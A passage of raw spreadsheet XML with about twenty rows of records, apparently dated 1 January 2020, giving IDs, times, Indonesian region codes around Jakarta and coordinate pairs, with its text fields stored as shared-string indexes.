    <row r="43" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A43">
        <v>97057</v>
      </c>
      <c r="B43" s="1">
        <v>43831</v>
      </c>
      <c r="C43" s="2">
        <v>0.2512152777777778</v>
      </c>
      <c r="D43" t="s">
        <v>22</v>
      </c>
      <c r="E43" t="s">
        <v>23</v>
      </c>
      <c r="F43" t="s">
        <v>265</v>
      </c>
      <c r="H43" t="s">
        <v>26</v>
      </c>
      <c r="I43" t="s">
        <v>166</v>
      </c>
      <c r="J43" t="s">
        <v>266</v>
      </c>
      <c r="L43" t="s">
        <v>267</v>
      </c>
      <c r="M43">
        <v>3174010006</v>
      </c>
      <c r="N43">
        <v>3174010</v>
      </c>
      <c r="O43">
        <v>3174</v>
      </c>
      <c r="P43">
        <v>31</v>
      </c>
      <c r="Q43" t="s">
        <v>268</v>
      </c>
      <c r="R43" t="s">
        <v>69</v>
      </c>
      <c r="S43" t="s">
        <v>32</v>
      </c>
      <c r="T43" t="s">
        <v>33</v>
      </c>
      <c r="U43" s="5">
        <v>10674504</v>
      </c>
      <c r="V43" s="5" t="s">
        <v>14494</v>
      </c>
      <c r="W43" s="5">
        <v>-617003</v>
      </c>
      <c r="X43" t="s">
        <v>18307</v>
      </c>
      <c r="Y43" t="str">
        <f t="shared" si="0"/>
        <v>-6.17003,106.74504</v>
      </c>
    </row>
    <row r="44" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A44">
        <v>97228</v>
      </c>
      <c r="B44" s="1">
        <v>43831</v>
      </c>
      <c r="C44" s="2">
        <v>0.27317129629629627</v>
      </c>
      <c r="D44" t="s">
        <v>22</v>
      </c>
      <c r="E44" t="s">
        <v>23</v>
      </c>
      <c r="F44" t="s">
        <v>269</v>
      </c>
      <c r="G44" t="s">
        <v>270</v>
      </c>
      <c r="H44" t="s">
        <v>26</v>
      </c>
      <c r="I44" t="s">
        <v>271</v>
      </c>
      <c r="J44" t="s">
        <v>37</v>
      </c>
      <c r="L44" t="s">
        <v>272</v>
      </c>
      <c r="M44">
        <v>3671020021</v>
      </c>
      <c r="N44">
        <v>3671020</v>
      </c>
      <c r="O44">
        <v>3671</v>
      </c>
      <c r="P44">
        <v>36</v>
      </c>
      <c r="Q44" t="s">
        <v>273</v>
      </c>
      <c r="R44" t="s">
        <v>274</v>
      </c>
      <c r="S44" t="s">
        <v>201</v>
      </c>
      <c r="T44" t="s">
        <v>171</v>
      </c>
      <c r="U44" s="5">
        <v>10666424</v>
      </c>
      <c r="V44" s="5" t="s">
        <v>14495</v>
      </c>
      <c r="W44" s="5">
        <v>-617684</v>
      </c>
      <c r="X44" t="s">
        <v>18308</v>
      </c>
      <c r="Y44" t="str">
        <f t="shared" si="0"/>
        <v>-6.17684,106.66424</v>
      </c>
    </row>
    <row r="45" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A45">
        <v>97285</v>
      </c>
      <c r="B45" s="1">
        <v>43831</v>
      </c>
      <c r="C45" s="2">
        <v>0.28531250000000002</v>
      </c>
      <c r="D45" t="s">
        <v>22</v>
      </c>
      <c r="E45" t="s">
        <v>23</v>
      </c>
      <c r="F45" t="s">
        <v>275</v>
      </c>
      <c r="G45" t="s">
        <v>276</v>
      </c>
      <c r="H45" t="s">
        <v>26</v>
      </c>
      <c r="I45" t="s">
        <v>277</v>
      </c>
      <c r="J45" t="s">
        <v>278</v>
      </c>
      <c r="L45" t="s">
        <v>279</v>
      </c>
      <c r="M45">
        <v>3172040004</v>
      </c>
      <c r="N45">
        <v>3172040</v>
      </c>
      <c r="O45">
        <v>3172</v>
      </c>
      <c r="P45">
        <v>31</v>
      </c>
      <c r="Q45" t="s">
        <v>280</v>
      </c>
      <c r="R45" t="s">
        <v>281</v>
      </c>
      <c r="S45" t="s">
        <v>49</v>
      </c>
      <c r="T45" t="s">
        <v>33</v>
      </c>
      <c r="U45" s="5">
        <v>10687850</v>
      </c>
      <c r="V45" s="5" t="s">
        <v>14496</v>
      </c>
      <c r="W45" s="5">
        <v>-626902</v>
      </c>
      <c r="X45" t="s">
        <v>18309</v>
      </c>
      <c r="Y45" t="str">
        <f t="shared" si="0"/>
        <v>-6.26902,106.87850</v>
      </c>
    </row>
    <row r="46" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A46">
        <v>97286</v>
      </c>
      <c r="B46" s="1">
        <v>43831</v>
      </c>
      <c r="C46" s="2">
        <v>0.28787037037037039</v>
      </c>
      <c r="D46" t="s">
        <v>22</v>
      </c>
      <c r="E46" t="s">
        <v>23</v>
      </c>
      <c r="F46" t="s">
        <v>282</v>
      </c>
      <c r="G46" t="s">
        <v>283</v>
      </c>
      <c r="H46" t="s">
        <v>26</v>
      </c>
      <c r="I46" t="s">
        <v>284</v>
      </c>
      <c r="J46" t="s">
        <v>37</v>
      </c>
      <c r="L46" t="s">
        <v>285</v>
      </c>
      <c r="M46">
        <v>3275010010</v>
      </c>
      <c r="N46">
        <v>3275010</v>
      </c>
      <c r="O46">
        <v>3275</v>
      </c>
      <c r="P46">
        <v>32</v>
      </c>
      <c r="Q46" t="s">
        <v>286</v>
      </c>
      <c r="R46" t="s">
        <v>287</v>
      </c>
      <c r="S46" t="s">
        <v>41</v>
      </c>
      <c r="T46" t="s">
        <v>42</v>
      </c>
      <c r="U46" s="5">
        <v>10695030</v>
      </c>
      <c r="V46" s="5" t="s">
        <v>14497</v>
      </c>
      <c r="W46" s="5">
        <v>-626173</v>
      </c>
      <c r="X46" t="s">
        <v>18310</v>
      </c>
      <c r="Y46" t="str">
        <f t="shared" si="0"/>
        <v>-6.26173,106.95030</v>
      </c>
    </row>
    <row r="47" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A47">
        <v>97295</v>
      </c>
      <c r="B47" s="1">
        <v>43831</v>
      </c>
      <c r="C47" s="2">
        <v>0.2961111111111111</v>
      </c>
      <c r="D47" t="s">
        <v>22</v>
      </c>
      <c r="E47" t="s">
        <v>23</v>
      </c>
      <c r="F47" t="s">
        <v>288</v>
      </c>
      <c r="G47" t="s">
        <v>289</v>
      </c>
      <c r="H47" t="s">
        <v>26</v>
      </c>
      <c r="I47" t="s">
        <v>290</v>
      </c>
      <c r="J47" t="s">
        <v>45</v>
      </c>
      <c r="L47" t="s">
        <v>291</v>
      </c>
      <c r="M47">
        <v>3172060004</v>
      </c>
      <c r="N47">
        <v>3172060</v>
      </c>
      <c r="O47">
        <v>3172</v>
      </c>
      <c r="P47">
        <v>31</v>
      </c>
      <c r="Q47" t="s">
        <v>47</v>
      </c>
      <c r="R47" t="s">
        <v>48</v>
      </c>
      <c r="S47" t="s">
        <v>49</v>
      </c>
      <c r="T47" t="s">
        <v>33</v>
      </c>
      <c r="U47" s="5">
        <v>10689135</v>
      </c>
      <c r="V47" s="5" t="s">
        <v>14498</v>
      </c>
      <c r="W47" s="5">
        <v>-623493</v>
      </c>
      <c r="X47" t="s">
        <v>18311</v>
      </c>
      <c r="Y47" t="str">
        <f t="shared" si="0"/>
        <v>-6.23493,106.89135</v>
      </c>
    </row>
    <row r="48" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A48">
        <v>97296</v>
      </c>
      <c r="B48" s="1">
        <v>43831</v>
      </c>
      <c r="C48" s="2">
        <v>0.30591435185185184</v>
      </c>
      <c r="D48" t="s">
        <v>22</v>
      </c>
      <c r="E48" t="s">
        <v>23</v>
      </c>
      <c r="F48" t="s">
        <v>292</v>
      </c>
      <c r="G48" t="s">
        <v>293</v>
      </c>
      <c r="H48" t="s">
        <v>26</v>
      </c>
      <c r="I48" t="s">
        <v>27</v>
      </c>
      <c r="J48" t="s">
        <v>294</v>
      </c>
      <c r="L48" t="s">
        <v>295</v>
      </c>
      <c r="M48">
        <v>3173060002</v>
      </c>
      <c r="N48">
        <v>3173060</v>
      </c>
      <c r="O48">
        <v>3173</v>
      </c>
      <c r="P48">
        <v>31</v>
      </c>
      <c r="Q48" t="s">
        <v>60</v>
      </c>
      <c r="R48" t="s">
        <v>61</v>
      </c>
      <c r="S48" t="s">
        <v>62</v>
      </c>
      <c r="T48" t="s">
        <v>33</v>
      </c>
      <c r="U48" s="5">
        <v>10686342</v>
      </c>
      <c r="V48" s="5" t="s">
        <v>14499</v>
      </c>
      <c r="W48" s="5">
        <v>-616707</v>
      </c>
      <c r="X48" t="s">
        <v>18312</v>
      </c>
      <c r="Y48" t="str">
        <f t="shared" si="0"/>
        <v>-6.16707,106.86342</v>
      </c>
    </row>
    <row r="49" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A49">
        <v>97297</v>
      </c>
      <c r="B49" s="1">
        <v>43831</v>
      </c>
      <c r="C49" s="2">
        <v>0.30932870370370369</v>
      </c>
      <c r="D49" t="s">
        <v>85</v>
      </c>
      <c r="E49" t="s">
        <v>23</v>
      </c>
      <c r="F49" t="s">
        <v>296</v>
      </c>
      <c r="G49" t="s">
        <v>297</v>
      </c>
      <c r="H49" t="s">
        <v>26</v>
      </c>
      <c r="I49" t="s">
        <v>103</v>
      </c>
      <c r="J49" t="s">
        <v>37</v>
      </c>
      <c r="K49" t="s">
        <v>298</v>
      </c>
      <c r="L49" t="s">
        <v>299</v>
      </c>
      <c r="M49">
        <v>3674060002</v>
      </c>
      <c r="N49">
        <v>3674060</v>
      </c>
      <c r="O49">
        <v>3674</v>
      </c>
      <c r="P49">
        <v>36</v>
      </c>
      <c r="Q49" t="s">
        <v>190</v>
      </c>
      <c r="R49" t="s">
        <v>169</v>
      </c>
      <c r="S49" t="s">
        <v>170</v>
      </c>
      <c r="T49" t="s">
        <v>171</v>
      </c>
      <c r="U49" s="5">
        <v>10668569</v>
      </c>
      <c r="V49" s="5" t="s">
        <v>14479</v>
      </c>
      <c r="W49" s="5">
        <v>-625710</v>
      </c>
      <c r="X49" t="s">
        <v>18292</v>
      </c>
      <c r="Y49" t="str">
        <f t="shared" si="0"/>
        <v>-6.25710,106.68569</v>
      </c>
    </row>
    <row r="50" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A50">
        <v>97361</v>
      </c>
      <c r="B50" s="1">
        <v>43831</v>
      </c>
      <c r="C50" s="2">
        <v>0.3130324074074074</v>
      </c>
      <c r="D50" t="s">
        <v>85</v>
      </c>
      <c r="E50" t="s">
        <v>23</v>
      </c>
      <c r="F50" t="s">
        <v>300</v>
      </c>
      <c r="G50" t="s">
        <v>301</v>
      </c>
      <c r="H50" t="s">
        <v>26</v>
      </c>
      <c r="J50" t="s">
        <v>37</v>
      </c>
      <c r="K50" t="s">
        <v>302</v>
      </c>
      <c r="L50" t="s">
        <v>303</v>
      </c>
      <c r="M50">
        <v>3674060002</v>
      </c>
      <c r="N50">
        <v>3674060</v>
      </c>
      <c r="O50">
        <v>3674</v>
      </c>
      <c r="P50">
        <v>36</v>
      </c>
      <c r="Q50" t="s">
        <v>190</v>
      </c>
      <c r="R50" t="s">
        <v>169</v>
      </c>
      <c r="S50" t="s">
        <v>170</v>
      </c>
      <c r="T50" t="s">
        <v>171</v>
      </c>
      <c r="U50" s="5">
        <v>10668569</v>
      </c>
      <c r="V50" s="5" t="s">
        <v>14479</v>
      </c>
      <c r="W50" s="5">
        <v>-625710</v>
      </c>
      <c r="X50" t="s">
        <v>18292</v>
      </c>
      <c r="Y50" t="str">
        <f t="shared" si="0"/>
        <v>-6.25710,106.68569</v>
      </c>
    </row>
    <row r="51" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A51">
        <v>97424</v>
      </c>
      <c r="B51" s="1">
        <v>43831</v>
      </c>
      <c r="C51" s="2">
        <v>0.31943287037037038</v>
      </c>
      <c r="D51" t="s">
        <v>85</v>
      </c>
      <c r="E51" t="s">
        <v>23</v>
      </c>
      <c r="F51" t="s">
        <v>304</v>
      </c>
      <c r="G51" t="s">
        <v>305</v>
      </c>
      <c r="H51" t="s">
        <v>26</v>
      </c>
      <c r="J51" t="s">
        <v>306</v>
      </c>
      <c r="K51" t="s">
        <v>307</v>
      </c>
      <c r="L51" t="s">
        <v>308</v>
      </c>
      <c r="M51">
        <v>3172060001</v>
      </c>
      <c r="N51">
        <v>3172060</v>
      </c>
      <c r="O51">
        <v>3172</v>
      </c>
      <c r="P51">
        <v>31</v>
      </c>
      <c r="Q51" t="s">
        <v>309</v>
      </c>
      <c r="R51" t="s">
        <v>48</v>
      </c>
      <c r="S51" t="s">
        <v>49</v>
      </c>
      <c r="T51" t="s">
        <v>33</v>
      </c>
      <c r="U51" s="5">
        <v>10686722</v>
      </c>
      <c r="V51" s="5" t="s">
        <v>14500</v>
      </c>
      <c r="W51" s="5">
        <v>-623831</v>
      </c>
      <c r="X51" t="s">
        <v>18313</v>
      </c>
      <c r="Y51" t="str">
        <f t="shared" si="0"/>
        <v>-6.23831,106.86722</v>
      </c>
    </row>
    <row r="52" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A52">
        <v>97442</v>
      </c>
      <c r="B52" s="1">
        <v>43831</v>
      </c>
      <c r="C52" s="2">
        <v>0.31966435185185188</v>
      </c>
      <c r="D52" t="s">
        <v>85</v>
      </c>
      <c r="E52" t="s">
        <v>23</v>
      </c>
      <c r="F52" t="s">
        <v>310</v>
      </c>
      <c r="G52" t="s">
        <v>311</v>
      </c>
      <c r="H52" t="s">
        <v>26</v>
      </c>
      <c r="J52" t="s">
        <v>37</v>
      </c>
      <c r="K52" t="s">
        <v>312</v>
      </c>
      <c r="L52" t="s">
        <v>313</v>
      </c>
      <c r="M52">
        <v>3674060002</v>
      </c>
      <c r="N52">
        <v>3674060</v>
      </c>
      <c r="O52">
        <v>3674</v>
      </c>
      <c r="P52">
        <v>36</v>
      </c>
      <c r="Q52" t="s">
        <v>190</v>
      </c>
      <c r="R52" t="s">
        <v>169</v>
      </c>
      <c r="S52" t="s">
        <v>170</v>
      </c>
      <c r="T52" t="s">
        <v>171</v>
      </c>
      <c r="U52" s="5">
        <v>10668569</v>
      </c>
      <c r="V52" s="5" t="s">
        <v>14479</v>
      </c>
      <c r="W52" s="5">
        <v>-625710</v>
      </c>
      <c r="X52" t="s">
        <v>18292</v>
      </c>
      <c r="Y52" t="str">
        <f t="shared" si="0"/>
        <v>-6.25710,106.68569</v>
      </c>
    </row>
    <row r="53" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A53">
        <v>97518</v>
      </c>
      <c r="B53" s="1">
        <v>43831</v>
      </c>
      <c r="C53" s="2">
        <v>0.34413194444444445</v>
      </c>
      <c r="D53" t="s">
        <v>22</v>
      </c>
      <c r="E53" t="s">
        <v>23</v>
      </c>
      <c r="F53" t="s">
        <v>314</v>
      </c>
      <c r="G53" t="s">
        <v>315</v>
      </c>
      <c r="H53" t="s">
        <v>26</v>
      </c>
      <c r="I53" t="s">
        <v>277</v>
      </c>
      <c r="J53" t="s">
        <v>37</v>
      </c>
      <c r="L53" t="s">
        <v>316</v>
      </c>
      <c r="M53">
        <v>3275041004</v>
      </c>
      <c r="N53">
        <v>3275041</v>
      </c>
      <c r="O53">
        <v>3275</v>
      </c>
      <c r="P53">
        <v>32</v>
      </c>
      <c r="Q53" t="s">
        <v>133</v>
      </c>
      <c r="R53" t="s">
        <v>134</v>
      </c>
      <c r="S53" t="s">
        <v>41</v>
      </c>
      <c r="T53" t="s">
        <v>42</v>
      </c>
      <c r="U53" s="5">
        <v>10700859</v>
      </c>
      <c r="V53" s="5" t="s">
        <v>14501</v>
      </c>
      <c r="W53" s="5">
        <v>-627237</v>
      </c>
      <c r="X53" t="s">
        <v>18314</v>
      </c>
      <c r="Y53" t="str">
        <f t="shared" si="0"/>
        <v>-6.27237,107.00859</v>
      </c>
    </row>
    <row r="54" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A54">
        <v>97897</v>
      </c>
      <c r="B54" s="1">
        <v>43831</v>
      </c>
      <c r="C54" s="2">
        <v>0.36995370370370373</v>
      </c>
      <c r="D54" t="s">
        <v>85</v>
      </c>
      <c r="E54" t="s">
        <v>23</v>
      </c>
      <c r="F54" t="s">
        <v>317</v>
      </c>
      <c r="G54" t="s">
        <v>318</v>
      </c>
      <c r="H54" t="s">
        <v>26</v>
      </c>
      <c r="J54" t="s">
        <v>319</v>
      </c>
      <c r="K54" t="s">
        <v>320</v>
      </c>
      <c r="L54" t="s">
        <v>321</v>
      </c>
      <c r="M54">
        <v>3173070001</v>
      </c>
      <c r="N54">
        <v>3173070</v>
      </c>
      <c r="O54">
        <v>3173</v>
      </c>
      <c r="P54">
        <v>31</v>
      </c>
      <c r="Q54" t="s">
        <v>322</v>
      </c>
      <c r="R54" t="s">
        <v>323</v>
      </c>
      <c r="S54" t="s">
        <v>62</v>
      </c>
      <c r="T54" t="s">
        <v>33</v>
      </c>
      <c r="U54" s="5">
        <v>10683314</v>
      </c>
      <c r="V54" s="5" t="s">
        <v>14502</v>
      </c>
      <c r="W54" s="5">
        <v>-616131</v>
      </c>
      <c r="X54" t="s">
        <v>18315</v>
      </c>
      <c r="Y54" t="str">
        <f t="shared" si="0"/>
        <v>-6.16131,106.83314</v>
      </c>
    </row>
    <row r="55" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A55">
        <v>97925</v>
      </c>
      <c r="B55" s="1">
        <v>43831</v>
      </c>
      <c r="C55" s="2">
        <v>0.36862268518518521</v>
      </c>
      <c r="D55" t="s">
        <v>85</v>
      </c>
      <c r="E55" t="s">
        <v>23</v>
      </c>
      <c r="F55" t="s">
        <v>324</v>
      </c>
      <c r="G55" t="s">
        <v>325</v>
      </c>
      <c r="H55" t="s">
        <v>26</v>
      </c>
      <c r="J55" t="s">
        <v>326</v>
      </c>
      <c r="K55" t="s">
        <v>327</v>
      </c>
      <c r="L55" t="s">
        <v>328</v>
      </c>
      <c r="M55">
        <v>3173060008</v>
      </c>
      <c r="N55">
        <v>3173060</v>
      </c>
      <c r="O55">
        <v>3173</v>
      </c>
      <c r="P55">
        <v>31</v>
      </c>
      <c r="Q55" t="s">
        <v>329</v>
      </c>
      <c r="R55" t="s">
        <v>61</v>
      </c>
      <c r="S55" t="s">
        <v>62</v>
      </c>
      <c r="T55" t="s">
        <v>33</v>
      </c>
      <c r="U55" s="5">
        <v>10683756</v>
      </c>
      <c r="V55" s="5" t="s">
        <v>14503</v>
      </c>
      <c r="W55" s="5">
        <v>-615914</v>
      </c>
      <c r="X55" t="s">
        <v>18316</v>
      </c>
      <c r="Y55" t="str">
        <f t="shared" si="0"/>
        <v>-6.15914,106.83756</v>
      </c>
    </row>
    <row r="56" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A56">
        <v>98064</v>
      </c>
      <c r="B56" s="1">
        <v>43831</v>
      </c>
      <c r="C56" s="2">
        <v>0.38709490740740743</v>
      </c>
      <c r="D56" t="s">
        <v>22</v>
      </c>
      <c r="E56" t="s">
        <v>23</v>
      </c>
      <c r="F56" t="s">
        <v>330</v>
      </c>
      <c r="G56" t="s">
        <v>331</v>
      </c>
      <c r="H56" t="s">
        <v>26</v>
      </c>
      <c r="I56" t="s">
        <v>332</v>
      </c>
      <c r="J56" t="s">
        <v>37</v>
      </c>
      <c r="L56" t="s">
        <v>333</v>
      </c>
      <c r="M56">
        <v>3216090001</v>
      </c>
      <c r="N56">
        <v>3216090</v>
      </c>
      <c r="O56">
        <v>3216</v>
      </c>
      <c r="P56">
        <v>32</v>
      </c>
      <c r="Q56" t="s">
        <v>334</v>
      </c>
      <c r="R56" t="s">
        <v>335</v>
      </c>
      <c r="S56" t="s">
        <v>41</v>
      </c>
      <c r="T56" t="s">
        <v>42</v>
      </c>
      <c r="U56" s="5">
        <v>10701213</v>
      </c>
      <c r="V56" s="5" t="s">
        <v>14504</v>
      </c>
      <c r="W56" s="5">
        <v>-618212</v>
      </c>
      <c r="X56" t="s">
        <v>18317</v>
      </c>
      <c r="Y56" t="str">
        <f t="shared" si="0"/>
        <v>-6.18212,107.01213</v>
      </c>
    </row>
    <row r="57" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A57">
        <v>98075</v>
      </c>
      <c r="B57" s="1">
        <v>43831</v>
      </c>
      <c r="C57" s="2">
        <v>0.36256944444444444</v>
      </c>
      <c r="D57" t="s">
        <v>85</v>
      </c>
      <c r="E57" t="s">
        <v>23</v>
      </c>
      <c r="F57" t="s">
        <v>336</v>
      </c>
      <c r="G57" t="s">
        <v>337</v>
      </c>
      <c r="H57" t="s">
        <v>26</v>
      </c>
      <c r="J57" t="s">
        <v>37</v>
      </c>
      <c r="K57" t="s">
        <v>338</v>
      </c>
      <c r="L57" t="s">
        <v>339</v>
      </c>
      <c r="M57">
        <v>3674040002</v>
      </c>
      <c r="N57">
        <v>3674040</v>
      </c>
      <c r="O57">
        <v>3674</v>
      </c>
      <c r="P57">
        <v>36</v>
      </c>
      <c r="Q57" t="s">
        <v>340</v>
      </c>
      <c r="R57" t="s">
        <v>229</v>
      </c>
      <c r="S57" t="s">
        <v>170</v>
      </c>
      <c r="T57" t="s">
        <v>171</v>
      </c>
      <c r="U57" s="5">
        <v>10671621</v>
      </c>
      <c r="V57" s="5" t="s">
        <v>14505</v>
      </c>
      <c r="W57" s="5">
        <v>-629700</v>
      </c>
      <c r="X57" t="s">
        <v>18318</v>
      </c>
      <c r="Y57" t="str">
        <f t="shared" si="0"/>
        <v>-6.29700,106.71621</v>
      </c>
    </row>
    <row r="58" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A58">
        <v>98370</v>
      </c>
      <c r="B58" s="1">
        <v>43831</v>
      </c>
      <c r="C58" s="2">
        <v>0.41155092592592596</v>
      </c>
      <c r="D58" t="s">
        <v>85</v>
      </c>
      <c r="E58" t="s">
        <v>23</v>
      </c>
      <c r="F58" t="s">
        <v>341</v>
      </c>
      <c r="G58" t="s">
        <v>342</v>
      </c>
      <c r="H58" t="s">
        <v>26</v>
      </c>
      <c r="J58" t="s">
        <v>343</v>
      </c>
      <c r="K58" t="s">
        <v>344</v>
      </c>
      <c r="L58" t="s">
        <v>345</v>
      </c>
      <c r="M58">
        <v>3171090007</v>
      </c>
      <c r="N58">
        <v>3171090</v>
      </c>
      <c r="O58">
        <v>3171</v>
      </c>
      <c r="P58">
        <v>31</v>
      </c>
      <c r="Q58" t="s">
        <v>346</v>
      </c>
      <c r="R58" t="s">
        <v>347</v>
      </c>
      <c r="S58" t="s">
        <v>108</v>
      </c>
      <c r="T58" t="s">
        <v>33</v>
      </c>
      <c r="U58" s="5">
        <v>10685439</v>
      </c>
      <c r="V58" s="5" t="s">
        <v>14506</v>
      </c>
      <c r="W58" s="5">
        <v>-621563</v>
      </c>
      <c r="X58" t="s">
        <v>18319</v>
      </c>
      <c r="Y58" t="str">
        <f t="shared" si="0"/>
        <v>-6.21563,106.85439</v>
      </c>
    </row>
    <row r="59" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A59">
        <v>98380</v>
      </c>
      <c r="B59" s="1">
        <v>43831</v>
      </c>
      <c r="C59" s="2">
        <v>0.4130092592592593</v>
      </c>
      <c r="D59" t="s">
        <v>85</v>
      </c>
      <c r="E59" t="s">
        <v>23</v>
      </c>
      <c r="F59" t="s">
        <v>348</v>
      </c>
      <c r="G59" t="s">
        <v>349</v>
      </c>
      <c r="H59" t="s">
        <v>26</v>
      </c>
      <c r="J59" t="s">
        <v>343</v>
      </c>
      <c r="K59" t="s">
        <v>350</v>
      </c>
      <c r="L59" t="s">
        <v>351</v>
      </c>
      <c r="M59">
        <v>3171090007</v>
      </c>
      <c r="N59">
        <v>3171090</v>
      </c>
      <c r="O59">
        <v>3171</v>
      </c>
      <c r="P59">
        <v>31</v>
      </c>
      <c r="Q59" t="s">
        <v>346</v>
      </c>
      <c r="R59" t="s">
        <v>347</v>
      </c>
      <c r="S59" t="s">
        <v>108</v>
      </c>
      <c r="T59" t="s">
        <v>33</v>
      </c>
      <c r="U59" s="5">
        <v>10685436</v>
      </c>
      <c r="V59" s="5" t="s">
        <v>14507</v>
      </c>
      <c r="W59" s="5">
        <v>-621562</v>
      </c>
      <c r="X59" t="s">
        <v>18320</v>
      </c>
      <c r="Y59" t="str">
        <f t="shared" si="0"/>
        <v>-6.21562,106.85436</v>
      </c>
    </row>
    <row r="60" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A60">
        <v>98505</v>
      </c>
      <c r="B60" s="1">
        <v>43831</v>
      </c>
      <c r="C60" s="2">
        <v>0.4370486111111111</v>
      </c>
      <c r="D60" t="s">
        <v>22</v>
      </c>
      <c r="E60" t="s">
        <v>23</v>
      </c>
      <c r="F60" t="s">
        <v>352</v>
      </c>
      <c r="G60" t="s">
        <v>353</v>
      </c>
      <c r="H60" t="s">
        <v>26</v>
      </c>
      <c r="I60" t="s">
        <v>354</v>
      </c>
      <c r="J60" t="s">
        <v>355</v>
      </c>
      <c r="L60" t="s">
        <v>356</v>
      </c>
      <c r="M60">
        <v>3172050006</v>
      </c>
      <c r="N60">
        <v>3172050</v>
      </c>
      <c r="O60">
        <v>3172</v>
      </c>
      <c r="P60">
        <v>31</v>
      </c>
      <c r="Q60" t="s">
        <v>357</v>
      </c>
      <c r="R60" t="s">
        <v>358</v>
      </c>
      <c r="S60" t="s">
        <v>49</v>
      </c>
      <c r="T60" t="s">
        <v>33</v>
      </c>
      <c r="U60" s="5">
        <v>10685902</v>
      </c>
      <c r="V60" s="5" t="s">
        <v>14508</v>
      </c>
      <c r="W60" s="5">
        <v>-626490</v>
      </c>
      <c r="X60" t="s">
        <v>18321</v>
      </c>
      <c r="Y60" t="str">
        <f t="shared" si="0"/>
        <v>-6.26490,106.85902</v>
      </c>
    </row>
    <row r="61" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A61">
        <v>98548</v>
      </c>
      <c r="B61" s="1">
        <v>43831</v>
      </c>
      <c r="C61" s="2">
        <v>0.44629629629629625</v>
      </c>
      <c r="D61" t="s">
        <v>22</v>
      </c>
      <c r="E61" t="s">
        <v>23</v>
      </c>
      <c r="F61" t="s">
        <v>359</v>
      </c>
      <c r="G61" t="s">
        <v>360</v>
      </c>
      <c r="H61" t="s">
        <v>26</v>
      </c>
      <c r="I61" t="s">
        <v>193</v>
      </c>
      <c r="J61" t="s">
        <v>361</v>
      </c>
      <c r="L61" t="s">
        <v>362</v>
      </c>
      <c r="M61">
        <v>3171030001</v>
      </c>
      <c r="N61">
        <v>3171030</v>
      </c>
      <c r="O61">
        <v>3171</v>
      </c>
      <c r="P61">
        <v>31</v>
      </c>
      <c r="Q61" t="s">
        <v>363</v>
      </c>
      <c r="R61" t="s">
        <v>364</v>
      </c>
      <c r="S61" t="s">
        <v>108</v>
      </c>
      <c r="T61" t="s">
        <v>33</v>
      </c>
      <c r="U61" s="5">
        <v>10678829</v>
      </c>
      <c r="V61" s="5" t="s">
        <v>14509</v>
      </c>
      <c r="W61" s="5">
        <v>-631112</v>
      </c>
      <c r="X61" t="s">
        <v>18322</v>
      </c>
      <c r="Y61" t="str">
        <f t="shared" si="0"/>
        <v>-6.31112,106.78829</v>
      </c>
    </row>
    <row r="62" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A62">
        <v>98595</v>
      </c>
      <c r="B62" s="1">
        <v>43831</v>
      </c>
      <c r="C62" s="2">
        <v>0.45552083333333332</v>
      </c>
      <c r="D62" t="s">
        <v>22</v>
      </c>
      <c r="E62" t="s">
        <v>23</v>
      </c>
      <c r="F62" t="s">
        <v>365</v>
      </c>
      <c r="G62" t="s">
        <v>366</v>
      </c>
      <c r="H62" t="s">
        <v>26</v>
      </c>
      <c r="I62" t="s">
        <v>367</v>
      </c>
      <c r="J62" t="s">
        <v>368</v>
      </c>
      <c r="L62" t="s">
        <v>369</v>
      </c>
      <c r="M62">
        <v>3171030003</v>
      </c>
      <c r="N62">
        <v>3171030</v>
      </c>
      <c r="O62">
        <v>3171</v>
      </c>
      <c r="P62">
        <v>31</v>
      </c>
      <c r="Q62" t="s">
        <v>370</v>
      </c>
      <c r="R62" t="s">
        <v>364</v>
      </c>
      <c r="S62" t="s">
        <v>108</v>
      </c>
      <c r="T62" t="s">
        <v>33</v>
      </c>
      <c r="U62" s="5">
        <v>10678974</v>
      </c>
      <c r="V62" s="5" t="s">
        <v>14510</v>
      </c>
      <c r="W62" s="5">
        <v>-630194</v>
      </c>
      <c r="X62" t="s">
        <v>18323</v>
      </c>
      <c r="Y62" t="str">
        <f t="shared" si="0"/>
        <v>-6.30194,106.78974</v>
      </c>
    </row>
    <row r="63" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A63">
        <v>98653</v>
      </c>
      <c r="B63" s="1">
        <v>43831</v>
      </c>
      <c r="C63" s="2">
        <v>0.47827546296296292</v>
      </c>
      <c r="D63" t="s">
        <v>22</v>
      </c>
      <c r="E63" t="s">
        <v>23</v>
      </c>
      <c r="F63" t="s">
        <v>371</v>
      </c>
      <c r="G63" t="s">
        <v>372</v>
      </c>
      <c r="H63" t="s">
        <v>26</v>
      </c>
      <c r="I63" t="s">
        <v>373</v>
      </c>
      <c r="J63" t="s">
        <v>374</v>
      </c>
      <c r="L63" t="s">
        <v>375</v>
      </c>
      <c r="M63">
        <v>3174040005</v>
      </c>
      <c r="N63">
        <v>3174040</v>
      </c>
      <c r="O63">
        <v>3174</v>
      </c>
      <c r="P63">
        <v>31</v>
      </c>
      <c r="Q63" t="s">
        <v>376</v>
      </c>
      <c r="R63" t="s">
        <v>377</v>
      </c>
      <c r="S63" t="s">
        <v>32</v>
      </c>
      <c r="T63" t="s">
        <v>33</v>
      </c>
      <c r="U63" s="5">
        <v>10678831</v>
      </c>
      <c r="V63" s="5" t="s">
        <v>14511</v>
      </c>
      <c r="W63" s="5">
        <v>-616380</v>
      </c>
      <c r="X63" t="s">
        <v>18324</v>
      </c>
      <c r="Y63" t="str">
        <f t="shared" si="0"/>
        <v>-6.16380,106.78831</v>
      </c>
    </row>
